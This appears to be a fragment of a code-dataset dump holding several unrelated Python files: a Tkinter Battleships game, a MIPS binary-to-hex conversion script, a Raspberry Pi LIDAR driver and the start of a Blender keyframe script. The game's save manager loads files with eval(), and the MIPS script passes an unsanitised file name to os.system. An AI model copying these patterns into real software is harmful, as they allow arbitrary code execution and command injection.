loss)\r\n resign_button = CustomButton(control_frame, text=\"⚑\", width=120, height=40,\r\n colour=theme.GOLD, fg=theme.WHITE, active=theme.GOLD_DARK,\r\n bg_canvas=theme.GRAY_LIGHT)\r\n resign_button.place(x=10, y=51, anchor='sw')\r\n resign_button.bind_to_click(lambda: self.game.check_win(override=True))\r\n\r\n\r\n # Function called when 'close_button' is clicked. Creates a popup #\r\n # asking whether or not player wishes to save the game. #\r\n def close():\r\n background = theme.GRAY_BLACK\r\n\r\n # Creates popup\r\n popup = Popup(root, text=\"Do you wish to save this game?\",\r\n subtext=\"Note: Oldest game will be deleted if memory is full.\",\r\n bg=background, fg=theme.WHITE, stay=True)\r\n popup[\"height\"] = 140\r\n\r\n # Sets the coordinates of where the main and subtext of the popup appear\r\n # Purpose: To make room for the yes/no buttons\r\n popup.coords(popup.main, int(popup[\"width\"]) / 2, 35)\r\n popup.coords(popup.sub, int(popup[\"width\"]) / 2, 60)\r\n\r\n # Container for the buttons\r\n container = tk.Frame(bg=background)\r\n\r\n # Creates a 'Yes' button, for saving the game.\r\n save = CustomButton(container, text=\"Yes\", colour=theme.GREEN, fg=theme.WHITE,\r\n active=theme.GREEN_DARK, bg_canvas=background,\r\n width=200, height=40)\r\n\r\n # Creates a 'No' button, for abandoning the game\r\n close = CustomButton(container, text=\"No\", colour=theme.RED, fg=theme.WHITE,\r\n active=theme.RED_DIM, bg_canvas=background,\r\n width=200, height=40)\r\n\r\n # Function called when any button is clicked, saves game (if applicable)\r\n # and returns back to startup splash\r\n def return_to_splash(save):\r\n if save:\r\n\r\n # Gets a summary data packet of the current game, saves to manager\r\n # and exports save data to a file (saves.bts)\r\n data = self.game.get_data_summary()\r\n manager.save_game(data)\r\n manager.export_to_file()\r\n\r\n # Destroys the popup and the container, returns to splash\r\n popup.destroy()\r\n container.destroy()\r\n switch_screen('splash')\r\n\r\n # Binds clicks of Yes/No buttons to 'return_to_splash' function\r\n close.bind_to_click(lambda: return_to_splash(save=False))\r\n save.bind_to_click(lambda: return_to_splash(save=True))\r\n\r\n save.pack(side='left', padx=10)\r\n close.pack(side='right', padx=10)\r\n\r\n # Places the button container just below the main and subtexts and popup\r\n container.place(x=root.winfo_width() / 2, y=root.winfo_height() / 2 + 35, anchor='center')\r\n\r\n # Destroys the popup window after 10 seconds if no activity happens.\r\n root.after(10000, container.destroy)\r\n\r\n # Creates the close_button\r\n close_button = CustomButton(control_frame, text=\"✘\", width=70, height=40,\r\n colour=theme.RED, fg=theme.WHITE, active=theme.RED_DIM, bg_canvas=theme.GRAY_LIGHT)\r\n close_button.place(x=210, y=51, anchor=\"se\")\r\n close_button.bind_to_click(lambda: close())\r\n\r\n\r\n### Game object with management on how the game runs ###\r\nclass Game(object):\r\n def __init__(self):\r\n\r\n # Difficulty selection range: easy, normal, hard, master\r\n self.difficulty = \"normal\"\r\n self.date = datetime.datetime.today()\r\n self.theme = Colours(manager.theme)\r\n\r\n self.manager = manager\r\n self.game_over = False\r\n\r\n # The following (up to #####) links to different elements #\r\n # in other classes for access to different information #\r\n\r\n # Structured as individual ships (with alpha-num coords), links to the playing grids\r\n self.player_ships = []\r\n self.player_remaining_ships = []\r\n\r\n self.computer_ships = []\r\n self.computer_remaining_ships = []\r\n\r\n # Structured as alpha-num coords, links to the playing grids\r\n self.player_board_hit = []\r\n self.computer_board_hit = []\r\n\r\n # Boards are linked to the 'playing grids' in GameWindow\r\n self.player_board = None\r\n self.computer_board = None\r\n\r\n # Status is linked to 'turn status' in GameWindow\r\n self.status = None\r\n\r\n #####\r\n\r\n # Defines the computer's brain for move/layout generation\r\n self.computer_logic = ComputerLogic()\r\n\r\n ## Sets the ships on player's board to the layout from setup ##\r\n def add_player_ships(self, ships_array):\r\n self.player_ships = copy.deepcopy(ships_array)\r\n self.player_remaining_ships = copy.deepcopy(ships_array)\r\n\r\n ## Sets out predefined ships for computer's board ##\r\n def add_computer_ships(self, ships_array):\r\n self.computer_ships = copy.deepcopy(ships_array)\r\n self.computer_remaining_ships = copy.deepcopy(ships_array)\r\n\r\n ## Sets the game grids (from the GameWindow class) for access to data ##\r\n def set_boards(self, player_board, computer_board):\r\n self.player_board = player_board\r\n self.computer_board = computer_board\r\n\r\n ## Exporting game data ##\r\n def get_data_summary(self):\r\n data = {\"difficulty\": self.difficulty, \"date\": self.date,\r\n \"player_ships\": self.player_ships,\r\n \"player_hit\": self.player_board_hit,\r\n\r\n \"computer_ships\": self.computer_ships,\r\n \"computer_hit\": self.computer_board_hit,\r\n \"computer_cache\": self.computer_logic.cached_ship_coords}\r\n\r\n return data\r\n\r\n ## Imports all the game data ##\r\n def import_data(self, data):\r\n self.difficulty = data[\"difficulty\"]\r\n\r\n self.add_player_ships(data[\"player_ships\"])\r\n self.player_board_hit = data[\"player_hit\"]\r\n\r\n self.add_computer_ships(data[\"computer_ships\"])\r\n self.computer_board_hit = data[\"computer_hit\"]\r\n self.computer_logic.cached_ship_coords = data[\"computer_cache\"]\r\n\r\n self.computer_logic.set_hit_spaces(self.player_board_hit)\r\n\r\n ## After any position is played (coord in alpha-num) ##\r\n # – Returns who's turn it is after the play\r\n # – Makes necessary changes to ship variables (if any are hit)\r\n ##\r\n def game_control(self, coord, board_name):\r\n\r\n # If last move was played on the computer's board (the big grid)\r\n if board_name == 'computer':\r\n self.computer_board_hit.append(coord)\r\n\r\n for ship in self.computer_remaining_ships:\r\n\r\n # Checks if the last move hit a ship\r\n if coord in ship:\r\n\r\n # Finds the original ship\r\n current_ship = self.computer_ships[self.computer_remaining_ships.index(ship)]\r\n name = Ship.get_name(len(current_ship))\r\n ship_sunk = False\r\n\r\n # If the length of the current ship (before hit) was 1 (i.e 1 more hit dead)\r\n if len(ship) == 1:\r\n ship_sunk = True\r\n print(\"Computer's {} is now sunk!\".format(name))\r\n\r\n # Removes the hit square from remaining spaces\r\n ship.remove(coord)\r\n\r\n return(board_name, ship_sunk, current_ship)\r\n\r\n # Did not hit a ship\r\n else:\r\n\r\n # Sets the current turn to 'COMPUTERS'\r\n self.status[\"text\"] = \"COMPUTER's\"\r\n self.status[\"fg\"] = self.theme.GOLD\r\n\r\n hit_coord = None\r\n counter = 0\r\n max = {'easy': 1,\r\n 'normal': 2,\r\n 'hard': 3,\r\n 'master': 4}.get(self.difficulty, 1)\r\n\r\n # Gives the computer up to '4 virtual turns' on hard difficulty\r\n while counter < max:\r\n hit_coord = CoordUtils.convert_type(self.computer_logic.make_move())\r\n\r\n # Checks if 'hit_coord' hits a ship\r\n for ship in self.player_remaining_ships:\r\n if CoordUtils.convert_type(hit_coord) in ship:\r\n counter += 100\r\n break\r\n else:\r\n counter += 1\r\n\r\n # Plays the coordinate previously generated after 1 second (to simulate 'thinking')\r\n def next(): self.player_board.hit(None, self.player_board.coord_to_rect(hit_coord), override=True)\r\n root.after(1000, next)\r\n\r\n # Returns that the next move is on the player's board (i.e computer's turn)\r\n return ('player',)\r\n\r\n # If computer was the one who played the last move\r\n elif board_name == 'player':\r\n self.player_board_hit.append(coord)\r\n\r\n for ship in self.player_remaining_ships:\r\n\r\n # Checks if the last move hit a ship\r\n if coord in ship:\r\n\r\n # Finds the original ship for aesthetic purposes\r\n current_ship = self.player_ships[self.player_remaining_ships.index(ship)]\r\n name = Ship.get_name(len(current_ship))\r\n ship_sunk = False\r\n\r\n # If the length of the current ship (before hit) was 1 (i.e 1 more hit dead)\r\n if len(ship) == 1:\r\n ship_sunk = True\r\n print(\"Player's {} is now sunk!\".format(name))\r\n\r\n # Removes the hit square from remaining spaces\r\n ship.remove(coord)\r\n\r\n # Generates a new hit coordinate based on previously hit coordinate\r\n hit_coord = CoordUtils.convert_type(self.computer_logic.square_hit(coord, sunk=ship_sunk, ship=current_ship))\r\n\r\n # Plays predefined coordinate after 1s (simulates 'thinking' time)\r\n def next(): self.player_board.hit(None, self.player_board.coord_to_rect(hit_coord), override=True)\r\n root.after(1000, next)\r\n\r\n return(board_name, ship_sunk, current_ship)\r\n\r\n # Didn't hit a ship\r\n else:\r\n\r\n # Sets turn status\r\n self.status[\"text\"] = \"PLAYER's\"\r\n self.status[\"fg\"] = self.theme.RED\r\n self.turn_counter = 0\r\n\r\n # Makes the main grid disabled (as it's computer's turn)\r\n self.computer_board.disabled = False\r\n return ('computer',)\r\n\r\n ## Check if all remaining occupied squares are hit – backend ##\r\n def check_win(self, override=False):\r\n\r\n # If game is already over, no point in creating\r\n # another popup so just returns nothing\r\n if self.game_over:\r\n return\r\n\r\n # Sets the current result to override\r\n result = override\r\n bg_colour = self.theme.GREEN_DIM\r\n\r\n # If the length of player ships is 0, make computer the winner\r\n for ship in self.player_remaining_ships:\r\n if len(ship) > 0: break\r\n else:\r\n\r\n # Sets result outcome to computer\r\n result = 'computer'\r\n print(\">>> Player lost!\")\r\n\r\n # Increment manager 'loss' stat of current difficulty by 1\r\n self.manager.stats[self.difficulty][1] += 1\r\n bg_colour = self.theme.RED\r\n\r\n # If the length of computer ships is 0, make player the winner\r\n for ship in self.computer_remaining_ships:\r\n if len(ship) > 0: break\r\n else:\r\n result = 'player'\r\n print(\">>> Player wins!\")\r\n\r\n # Increments win stat of current difficulty by 1\r\n self.manager.stats[self.difficulty][0] += 1\r\n\r\n\r\n # If player resigns (i.e override = True)\r\n if result and result not in (\"player\", \"computer\"):\r\n print(\">>> Player resigns.\")\r\n\r\n # Increments loss stat of current difficulty by 1\r\n self.manager.stats[self.difficulty][1] += 1\r\n bg_colour = self.theme.RED\r\n\r\n # If result isn't false (i.e game is over)\r\n if result:\r\n\r\n # Save information to file\r\n manager.export_to_file()\r\n\r\n # Sets game over variable to true\r\n self.game_over = True\r\n\r\n # Makes a result popup appear after 1.2s\r\n def popup_appear():\r\n # Switches the screen to startup 'splash' window\r\n switch_screen('splash')\r\n\r\n subtext = \"Current score: {} wins and {} losses on {} difficulty\".format(manager.stats[self.difficulty][0],\r\n manager.stats[self.difficulty][1],\r\n self.difficulty.upper())\r\n result_popup = Popup(root, text=\"YOU {}!\".format(\"WON\" if (result == \"player\") else \"LOST\"),\r\n bg=bg_colour, fg=self.theme.WHITE, fill=True,\r\n subtext=subtext)\r\n root.after(1200, popup_appear)\r\n\r\n return result\r\n\r\n\r\n### How the computer decides to play, best to its ability ###\r\n# Note: Computer gameplay difficulty is determined through the 'game' class\r\n#####\r\nclass ComputerLogic(object):\r\n def __init__(self):\r\n\r\n # Alpha-num list of coordinates on the board that have yet to be hit\r\n self.grid = []\r\n\r\n for x in range(10):\r\n for y in range(10):\r\n self.grid.append(CoordUtils.convert_type(x + 1) + str(y + 1))\r\n\r\n # Alpha-num list of coordinates with ships\r\n self.cached_ship_coords = []\r\n\r\n ## Returns a coordinate that has yet to be hit, in alpha-num form ##\r\n def make_move(self):\r\n\r\n # If no ships were hit in previous turns, make random move\r\n if len(self.cached_ship_coords) == 0:\r\n coord = random.choice(self.grid)\r\n surrounding = CoordUtils.get_surrounding_coords(coord)\r\n\r\n for surrounding_coord in surrounding:\r\n\r\n # Checks to see if there are any spaces around the coordinate,\r\n # since there isn't a point in hitting into an enclosed area\r\n if CoordUtils.convert_type(surrounding_coord) in self.grid:\r\n self.grid.remove(coord)\r\n return coord\r\n else:\r\n return self.make_move()\r\n\r\n # If a ship was recently hit (i.e cached), hit around\r\n else:\r\n\r\n # If two or more ship spaces have been hit\r\n if len(self.cached_ship_coords) > 1:\r\n\r\n # For every coordinate with a hit ship in it, check around\r\n for i in range(0, len(self.cached_ship_coords)):\r\n sides = [CoordUtils.get_side_coord(self.cached_ship_coords[i], 'left'),\r\n CoordUtils.get_side_coord(self.cached_ship_coords[i], 'right'),\r\n CoordUtils.get_side_coord(self.cached_ship_coords[i], 'top'),\r\n CoordUtils.get_side_coord(self.cached_ship_coords[i], 'bottom')]\r\n\r\n linked_sides = []\r\n converted_sides = []\r\n\r\n # Checks to see if any sides are linked (i.e contains a previously hit ship)\r\n # and appends it to linked sides. Also creates a copy of sides (converted_sides)\r\n # in which the type has been converted to alpha-num form\r\n for side in sides:\r\n if side: converted_sides.append(CoordUtils.convert_type(side))\r\n else: converted_sides.append(None)\r\n\r\n if side and CoordUtils.convert_type(side) in self.cached_ship_coords:\r\n linked_sides.append(CoordUtils.convert_type(side))\r\n\r\n # If the two hit spaces aren't 'connected', choose random side\r\n # – This shouldn't happen, but if it does... backup redundancy\r\n if len(linked_sides) == 0:\r\n while True:\r\n\r\n # Randomly choose a target based on a surrounding coordinate\r\n target = random.choice(converted_sides)\r\n\r\n # If the target choosen is in the computer's grid\r\n if target and target in self.grid:\r\n self.grid.remove(target)\r\n return target\r\n\r\n # If only one side of the hit square is hit\r\n if len(linked_sides) == 1:\r\n index = converted_sides.index(linked_sides[0])\r\n\r\n # Checks which side the hit square is on, and hit on the opposite side\r\n if index == 0 and converted_sides[1] in self.grid:\r\n self.grid.remove(converted_sides[1])\r\n return converted_sides[1]\r\n\r\n elif index == 1 and converted_sides[0] in self.grid:\r\n self.grid.remove(converted_sides[0])\r\n return converted_sides[0]\r\n\r\n elif index == 2 and converted_sides[3] in self.grid:\r\n self.grid.remove(converted_sides[3])\r\n return converted_sides[3]\r\n\r\n elif index == 3 and converted_sides[2] in self.grid:\r\n self.grid.remove(converted_sides[2])\r\n return converted_sides[2]\r\n\r\n else:\r\n continue\r\n\r\n # If both sides of the hit square are hit, continue to next hit coord\r\n if len(linked_sides) == 2:\r\n continue\r\n\r\n surrounding_coords = CoordUtils.get_surrounding_coords(self.cached_ship_coords[0])\r\n\r\n potential_targets = []\r\n\r\n # Append to potential_targets if the surrounding coordinate has yet to be hit\r\n for coord in surrounding_coords:\r\n if CoordUtils.convert_type(coord) in self.grid:\r\n potential_targets.append(CoordUtils.convert_type(coord))\r\n\r\n # Hits the potential_target, else make a random choice\r\n if len(potential_targets) != 0:\r\n target = random.choice(potential_targets)\r\n self.grid.remove(target)\r\n\r\n return target\r\n else:\r\n self.cached_ship_coords = []\r\n return self.make_move()\r\n\r\n ## Note: \"square\" argument is for a coord in alpha-num form (i.e D4) ##\r\n def square_hit(self, coord, sunk=False, ship=None):\r\n\r\n # If the ship was sunk, removes sunk_ship_coordinates from the cache\r\n if sunk: self.cached_ship_coords = [coord for coord in self.cached_ship_coords if coord not in ship]\r\n\r\n # If ship wasn't sunk, add the hit coordinate to the cache\r\n else: self.cached_ship_coords.append(coord)\r\n\r\n next_move = self.make_move()\r\n return next_move\r\n\r\n ## Automatically generates the computer's layout ##\r\n def generate_layout(self):\r\n\r\n # Potential ship types\r\n ship_lengths = [2, 3, 3, 4, 5]\r\n direction = ['right', 'bottom']\r\n\r\n computer_ships = []\r\n coords = []\r\n\r\n # As long as there are still ships to make\r\n while len(ship_lengths) > 0:\r\n\r\n # Generates random coordinates\r\n x = random.randint(1, 10)\r\n y = random.randint(1, 10)\r\n\r\n length = random.choice(ship_lengths)\r\n\r\n # Gets the coordinates of the ship that will be created\r\n ship_coords = CoordUtils.get_coords_along_side((x, y), random.choice(direction), length)\r\n\r\n # If the new coordinates for the to-be-created ship exist, make it a thing\r\n # If they don't exist (i.e obstruct another ship or non-exist grid squares),\r\n # restart the loop. Process continues until all ships have been placed.\r\n if ship_coords:\r\n for coord in ship_coords:\r\n if coord in coords:\r\n break\r\n else:\r\n # Adds new ship to temp 'computer_ships' variable\r\n computer_ships.append(ship_coords)\r\n [coords.append(coord) for coord in ship_coords]\r\n\r\n # Removes the current ship length from the list of possible lengths\r\n ship_lengths.remove(length)\r\n\r\n return computer_ships\r\n\r\n ## Updates the computer's grid memory by removing previously hit spces ##\r\n # Note: Coordinates to be in alpha-num form\r\n def set_hit_spaces(self, hit_spaces):\r\n for coord in hit_spaces:\r\n if coord in self.grid:\r\n self.grid.remove(coord)\r\n\r\n\r\n### Manager for reading / writing to files for saving ###\r\nclass Manager(object):\r\n def __init__(self):\r\n self.saved_games = []\r\n\r\n # Note: [0] is wins, [1] is losses\r\n self.stats = {'easy': [0, 0],\r\n 'normal': [0, 0],\r\n 'hard': [0, 0],\r\n 'master': [0, 0]}\r\n\r\n # Defines theme as 'default' theme\r\n self.theme = \"default\"\r\n\r\n ## Export all saved games (3) and scores to file ##\r\n def export_to_file(self):\r\n\r\n # Writes/overwrites stats.bts file with new stats\r\n with open('bin/stats.bts', 'w') as file:\r\n file.write(str(self.stats))\r\n\r\n # Writes/overwrites saves.bts file with new stats\r\n with open('bin/saves.bts', 'w') as file:\r\n file.write(str(self.saved_games))\r\n\r\n ## Imports all saved games (3) and scores to memory ##\r\n def import_to_memory(self):\r\n\r\n # If stats.bts is a file, import everything from stats\r\n if os.path.isfile('bin/stats.bts'):\r\n with open('bin/stats.bts', 'r') as file:\r\n self.stats = eval(file.read())\r\n\r\n # If saves.bts is a file, import everything from saves\r\n if os.path.isfile('bin/saves.bts'):\r\n with open('bin/saves.bts', 'r') as file:\r\n self.saved_games = eval(file.read())\r\n\r\n ## Resets the scores to 0 ##\r\n def reset_scores(self):\r\n self.stats = {'easy': [0, 0],\r\n 'normal': [0, 0],\r\n 'hard': [0, 0],\r\n 'master': [0, 0]}\r\n self.export_to_file()\r\n\r\n ## Replaces old games if all saves are full ##\r\n def save_game(self, game_data):\r\n\r\n # If current length of saves is greater than 2 (3 or more), delete oldest\r\n if len(self.saved_games) > 2:\r\n del self.saved_games[0]\r\n\r\n # Add new save\r\n self.saved_games.append(game_data)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # Defines the manager for the application\r\n manager = Manager()\r\n manager.import_to_memory()\r\n\r\n root = tk.Tk()\r\n\r\n # Defines starting layout\r\n root.wm_geometry(\"850x600\")\r\n root.wm_resizable(0, 0)\r\n root.wm_title(\"Battleships V{:.2f} beta\".format(version))\r\n\r\n root[\"bg\"] = 'white'\r\n\r\n # The 'frame' that's displayed on the application window\r\n current_screen = None\r\n\r\n # Makes main window appear as startup splash\r\n switch_screen('splash')\r\n\r\n root.mainloop()\r\n\r\n # Exports manager stats and saves to file if application is closed.\r\n manager.export_to_file()\r\n","sub_path":"Battleships (v2.21)/battleships.py","file_name":"battleships.py","file_ext":"py","file_size_in_byte":54810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"322910937","text":"import binascii\nimport sys\nimport os\n#import re\n#import struct\n\nsourceFile = sys.argv[1]#raw_input(\"Input assembly source file name: \")\n#sourceFile = raw_input(\"Input assembly source file name: \")\nif os.path.isfile(sourceFile) == False:\n print(sourceFile + \" doesn't exist!\")\n os._exit(0)\n\n#if os.path.isfile(\"as-new\") == False:\n# print(sourceFile + \" doesn't exist!\")\n# os._exit(0)\n\n#if os.path.isfile(\"mipsel-linux-ld\") == False:\n# print(sourceFile + \" doesn't exist!\")\n# os._exit(0)\n\nif os.path.isfile(\"mipsel-linux-objcopy\") == False:\n print(sourceFile + \" doesn't exist!\")\n os._exit(0)\n\n#objectFile = sourceFile[:-2] + \".o\"\noutFile = sourceFile[:-4] + \".out\"\ndatFileSim = sourceFile[:-4]\ndatFileRtl = sourceFile[:-4] + \".dat\"\n\n#fopen=open(objectFile,'rb')\n#w_str=\"\"\n#for line in fopen:\n# if re.search(\"e803\",line):\n# line=re.sub(\"e803\",\"0800\",line)\n# w_str+=line\n# else:\n# w_str+=line\n#fopen.close()\n#wopen=open(objectFile,'w')\n#wopen.write(w_str)\n#wopen.close()\n'''\nwith open(objectFile,'rb') as fd:\n buff = fd.read()\n\nl = len(buff)\ns = struct.unpack('%ds'%l,buff)[0]\n#print(s)\ns = list(s)\ns[18] = 0x08\ns[19] = 0x00\ns = bytes(s)\nbuff = struct.pack('%ds'%l,s)\n#print(buff)\n\nwith open(objectFile,'wb') as fd:\n fd.write(buff)\n'''\n#os.system(\"./as-new \" + sourceFile + \" -g --gdwarf-2 -o \" + objectFile)\n#os.system(\"./mipsel-linux-ld -T link.x \" + objectFile + \" -o \" + outFile)\nos.system(\"./mipsel-linux-objcopy -O binary \"+ outFile + \" \" + datFileSim)\nif os.path.isfile(datFileSim) == False:\n print(\"Doesn't create \"+datFileSim)\n os._exit(0)\nfb_s = open(datFileSim,'rb')\nfb_d = open(datFileRtl,'w')\n\n#process data segment\n#1)a line in data segment file has 4 words (32bits per word),such as 1 2 3 4 ,reverse it to 4 3 2 1\n#2)if encountering 9 consecutive 0 line in data segment\n# ignoring the left part of data segment\nzero_count = 0\nfor i in range(0,65536):\n insnPack = fb_s.read(16)\n if(len(insnPack) != 16):\n break\n# if(insnPack == \"0000000000000000\"):\n# continue\n insnPack = binascii.b2a_hex(insnPack)\n if(insnPack == \"00000000000000000000000000000000\"):\n zero_count += 1\n else:\n zero_count = 0\n# do not print following zero lines after encounter 9 consecutive zero lines\n# but still reading and counting until a non-zero line, where clear zero_count\n# and restart print.\n if(zero_count > 9):\n continue\n insn0 = insnPack[0:8]\n insn1 = insnPack[8:16]\n insn2 = insnPack[16:24]\n insn3 = insnPack[24:32]\n# if(insn0 == \"00000000\" and insn1 == \"00000000\" and insn2 == \"00000000\" and insn3 == \"00000000\"):\n# continue\n insn0 = insn0[6:8]+insn0[4:6]+insn0[2:4]+insn0[0:2] + '\\n'\n insn1 = insn1[6:8]+insn1[4:6]+insn1[2:4]+insn1[0:2] + '_'\n insn2 = insn2[6:8]+insn2[4:6]+insn2[2:4]+insn2[0:2] + '_'\n insn3 = insn3[6:8]+insn3[4:6]+insn3[2:4]+insn3[0:2] + '_'\n addr = '{0:0>4}'.format(hex(i).replace(\"0x\",''))\n #i#fb_d.write(addr + '\\n')\n fb_d.write(\"32'h000\" + addr + '0,\\t' + \"128'h\" + insn3 + insn2 + insn1 + insn0)\n\n#process code segment\n#a line in code segment file has 4 instructions(32bits per instruction) so that 16 char (32 hexes) per line,\n#reversing the sequence of 4 bytes in a instruction for the sake of transform little-endian to Big-endian,\n#such as 0x12345678 switched to 0x78563412.\nfor i in range(64,32768):\n insnPack = fb_s.read(16)\n if(len(insnPack) != 16):\n break\n insnPack = binascii.b2a_hex(insnPack)\n insn0 = insnPack[0:8]\n insn1 = insnPack[8:16]\n insn2 = insnPack[16:24]\n insn3 = insnPack[24:32]\n insn0 = insn0[6:8]+insn0[4:6]+insn0[2:4]+insn0[0:2] + '_'\n insn1 = insn1[6:8]+insn1[4:6]+insn1[2:4]+insn1[0:2] + '_'\n insn2 = insn2[6:8]+insn2[4:6]+insn2[2:4]+insn2[0:2] + '_'\n insn3 = insn3[6:8]+insn3[4:6]+insn3[2:4]+insn3[0:2] + '\\n'\n addr = '{0:0>4}'.format(hex(i).replace(\"0x\",''))\n #i#fb_d.write(addr + '\\n')\n fb_d.write(\"32'h001\" + addr + '0,\\t' + \"128'h\" + insn0 + insn1 + insn2 + insn3)\n\ninsnPack = binascii.b2a_hex(insnPack)\nif(len(insnPack) == 8):\n insn0 = insnPack[0:8]\n insn0 = insn0[6:8]+insn0[4:6]+insn0[2:4]+insn0[0:2] + '_'\n insn3 = '80000000'\n addr = '{0:0>4}'.format(hex(i).replace(\"0x\",''))\n fb_d.write(\"32'h001\" + addr + '0,\\t' + \"128'h\" + insn0 + insn3 + '_' + insn3 + '_' + insn3 + '\\n')\nelif(len(insnPack) == 16):\n insn0 = insnPack[0:8]\n insn1 = insnPack[8:16]\n insn0 = insn0[6:8]+insn0[4:6]+insn0[2:4]+insn0[0:2] + '_'\n insn1 = insn1[6:8]+insn1[4:6]+insn1[2:4]+insn1[0:2] + '_'\n insn3 = '80000000'\n addr = '{0:0>4}'.format(hex(i).replace(\"0x\",''))\n fb_d.write(\"32'h001\" + addr + '0,\\t' + \"128'h\" + insn0 + insn1 + insn3 + '_' + insn3 + '\\n')\nelif(len(insnPack) == 24):\n insn0 = insnPack[0:8]\n insn1 = insnPack[8:16]\n insn2 = insnPack[16:24]\n insn0 = insn0[6:8]+insn0[4:6]+insn0[2:4]+insn0[0:2] + '_'\n insn1 = insn1[6:8]+insn1[4:6]+insn1[2:4]+insn1[0:2] + '_'\n insn2 = insn2[6:8]+insn2[4:6]+insn2[2:4]+insn2[0:2] + '_'\n insn3 = '80000000'\n addr = '{0:0>4}'.format(hex(i).replace(\"0x\",''))\n fb_d.write(\"32'h001\" + addr + '0,\\t' + \"128'h\" + insn0 + insn1 + insn2 + insn3 + '\\n')\nelif(len(insnPack) != 0):\n print('error in length of instructions !')\n\n\n \n#insn = fb_s.read(4)\n#insnString = binascii.b2a_hex(insn)\n#print insnString[6:8]+insnString[4:6]+insnString[2:4]+insnString[0:2]\n\n#insn = fb_s.read(4)\n#insnString = binascii.b2a_hex(insn)\n#print insnString[6:8]+insnString[4:6]+insnString[2:4]+insnString[0:2]\n\n\nfb_s.close()\nfb_d.close()\n","sub_path":"20190603-linux-linker/命令行使用/trobjdat.py","file_name":"trobjdat.py","file_ext":"py","file_size_in_byte":5601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"54326228","text":"import smbus\nimport threading\nimport time\nimport RPi.GPIO as GPIO\nfrom collections import deque\n\n\nclass LIDARLite(threading.Thread):\n\n ADDR = 0x62\n I2C_BUS_NO = 1\n INTERRUPT_GPIO_PIN = 4\n\n def __init__(self):\n super().__init__()\n self.bus = smbus.SMBus(LIDARLite.I2C_BUS_NO)\n self.address = LIDARLite.ADDR\n self.since_bias_correction = 0 # used to perform a reciever bias correction every n measurements\n self.bias_correction_interval = 100\n self._terminate = threading.Event()\n\n def run(self):\n print(\"LIDAR Lite thread initialized on address %s\" % (self.address))\n self.initialize()\n while True:\n if self._terminate.is_set():\n self.cleanup()\n break\n\n GPIO.wait_for_edge(LIDARLite.INTERRUPT_GPIO_PIN, GPIO.FALLING) # blocks until we see a falling edge on the LIDAR\n tm = time.time()\n\n # actually read from the lidar\n dist_cm = self.read()\n print(dist_cm)\n\n self.measurement_buffer.append((tm, dist_cm/100))\n\n self.since_bias_correction += 1\n # every so often, we need to perform a bias correction routine\n if self.since_bias_correction >= self.bias_correction_interval:\n self.bias_correction_mode()\n self.since_bias_correction = -1\n elif self.since_bias_correction == 0:\n self.normal_mode()\n\n def initialize(self):\n\n # LIDAR Lite initialisation over I2C\n self.bus.write_byte_data(self.address, 0x11, 0xff) # continuously repeat measure command\n self.bus.write_byte_data(self.address, 0x45, 0x03) # command repeat interval - should be approximately 2000/Hz\n self.bus.write_byte_data(self.address, 0x04, 0x35) # acquisition mode control register. set to interrupt and run fast\n self.bus.write_byte_data(self.address, 0x00, 0x04) # initially make measurement with reciever bias correction\n self.bus.write_byte_data(self.address, 0x12, 0x03) # number of acquisitions per measurement\n\n # Enable the interrupt pin for interrupt\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(self.INTERRUPT_GPIO_PIN, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n\n self.last_tm = time.time() # so we can capture the dt between interrupts from the lidar - for debugging purposes\n self.measurement_buffer = deque([], maxlen=1000) # fills with a list of (tm, dist) tuples. deque to stop filling memory and crashing\n\n def read(self):\n \"\"\" Read the distance from the LIDAR's registers, in cm \"\"\"\n high_byte = self.bus.read_byte_data(self.address, 0x0f)\n low_byte = self.bus.read_byte_data(self.address, 0x10)\n return (high_byte << 8) + low_byte\n\n def flush(self):\n \"\"\" Return the recent sensor measurements, and clear the measurement buffer \"\"\"\n ret_list = list(self.measurement_buffer)\n self.measurement_buffer.clear()\n return ret_list\n\n def bias_correction_mode(self):\n self.bus.write_byte_data(self.address, 0x00, 0x04) # set the LIDAR to perform a bias correction routine\n\n def normal_mode(self):\n self.bus.write_byte_data(self.address, 0x00, 0x03) # set the LIDAR to just measure\n\n def terminate(self):\n self._terminate.set()\n\n def cleanup(self):\n print(\"Terminating LIDAR Lite read loop\")\n GPIO.cleanup()\n","sub_path":"lidar.py","file_name":"lidar.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"228141895","text":"#!BPY\n\n\"\"\" Shift keyframes in order to speed-up/slow-down a movie\nor give time for another sequence of animations in between.\n\"\"\"\n#\n# Kristin Riebe, E-Science at AIP, kriebe@aip.de, 04.02.2015\n#\n# NOTE: This can break your animation completely, if keyframes\n# 'overtake' one another. There's no error handling included here.\n# NOTE: Only works properly for fcurves with bezier-shape or poly-curves.\n# Fcurve-modifiers are not taken into account.\n#\n# TODO: Maybe only stretch keyframes with data_path location etc.\n# for material/texture fades, keep the distance, but\n# shift the initial keyframe?\n\n\nimport bpy\nimport fnmatch\n\n\ndef get_actions_for_objects(namepattern=\"*\"):\n \"\"\"Collect all actions for the matching objects, their data \n and their materials. Each material-action is to be used only once.\n Return set of actions that can be used as input for\n shift_keyframes().\n\n Keyword arguments:\n namepattern -- name pattern of objects for which the animation-\n actions are collected. (default: *)\n\n \"\"\"\n # NOTE: If a non-matching object has the same material as a\n # matching object, its material keyframes will be shifted!!\n # If you don't want that, make the non-matching object's material\n # unique beforehand.\n\n # Find matching objects and store in list\n bpy.ops.object.select_all(action='DESELECT')\n objects = [obj for obj in bpy.data.objects\n if fnmatch.fnmatchcase(obj.name, namepattern)]\n\n # Gather all necessary actions for the objects and their materials,\n # use set() in order to get unique values only,\n # i.e. each animation-action (especially for materials) shall occur only\n # once.\n actions = set()\n for obj in objects:\n print(\"Object \", obj.name)\n\n if obj.animation_data is not None:\n action = obj.animation_data.action\n if action is not None:\n actions.add(action)\n\n if obj.data is not None:\n if obj.data.animation_data is not None:\n action = obj.data.animation_data.action\n if action is not None:\n actions.add(action)\n\n # Loop over materials of this object\n for matslot in obj.material_slots:\n print(\"Material \", matslot.name)\n\n if matslot.material.animation_data is not None:\n action = matslot.material.animation_data.action\n if action is not None:\n actions.add(action)\n\n return actions\n\n\ndef shift_keyframes(actions=bpy.data.actions, 